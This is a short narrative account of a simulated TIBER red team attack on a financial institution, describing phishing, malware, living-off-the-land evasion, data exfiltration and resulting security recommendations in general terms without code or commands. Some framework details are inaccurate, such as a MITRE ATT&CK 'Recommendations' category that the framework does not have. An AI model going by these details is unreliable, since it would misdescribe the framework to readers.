TIBER Red Team – A Story
Our TIBER red team was engaged by a large financial institution to conduct a simulated cyber attack against their systems. The goal of the engagement was to identify and prioritize vulnerabilities in the organization’s defenses, and to provide recommendations for improvement.
We started by gathering as much information about the organization as we could, using a variety of tactics from the MITRE ATT&CK framework’s “Initial Access” category. This included spearphishing campaigns targeting specific employees, purchasing and using information from the dark web, and even physically visiting the organization’s offices and taking note of any potential entry points.
Once we had a good understanding of the organization’s defenses and potential vulnerabilities, we moved on to the “Execution” phase of the attack. We used a number of tactics in this phase, including using legitimate credentials to access the organization’s systems, deploying malware through the use of phishing emails and infected USB drives, and leveraging zero-day vulnerabilities to gain access to sensitive data.
As we moved deeper into the organization’s systems, we encountered a number of challenges and roadblocks. The organization’s security team was quick to respond to our attacks and worked tirelessly to track our movements and shut down our access. In response, we had to continually adapt and find new ways to evade detection and maintain access.
One particularly effective tactic we used was “Living off the Land” – leveraging legitimate tools and resources already present on the organization’s systems to carry out our attacks. This allowed us to blend in with normal system activity and made it much harder for the security team to detect our presence.
Ultimately, we were able to gain access to a number of sensitive systems and exfiltrate a large amount of data. However, our job was far from over – we still needed to document our findings and provide recommendations for improvement.
To do this, we used the MITRE ATT&CK framework’s “Impact” category to identify the potential consequences of our actions and the “Recommendations” category to provide guidance on how the organization could better defend against similar attacks in the future.
Some of the key recommendations we made included strengthening password policies, implementing two-factor authentication, regularly updating and patching systems, and investing in employee training to raise awareness of cyber threats.
Overall, the TIBER red teaming engagement was a challenging but rewarding experience. We were able to identify and exploit a number of vulnerabilities in the organization’s defenses, and our recommendations will help them to better protect themselves against future attacks